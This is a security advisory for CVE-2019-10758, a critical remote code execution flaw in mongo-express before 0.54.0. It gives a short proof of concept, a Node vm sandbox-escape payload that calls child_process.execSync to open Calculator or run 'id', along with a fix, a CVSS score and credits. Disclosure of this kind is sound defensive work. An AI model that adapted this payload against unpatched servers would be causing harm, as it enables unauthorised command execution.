Remote Code Execution (RCE)

Affecting mongo-express package, versions <0.54.0

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that use the toBSON method. A misuse of the vm dependency to perform exec commands in a non-safe environment.

PoC by Jonathan Leitschuh

# MacOS
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

  it('should not be executable', function () {
      const test = `
      this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())
      `;
      const result = bson.toBSON(calculatorTest);
    });

Remediation

Upgrade mongo-express to version 0.54.0 or higher.

References

CVSS Score

10.0
critical severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Changed
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C
Credit
Jonathan Leitschuh
CVE
CVE-2019-10758
CWE
CWE-94
Snyk ID
SNYK-JS-MONGOEXPRESS-473215
Disclosed
14 Oct, 2019
Published
16 Oct, 2019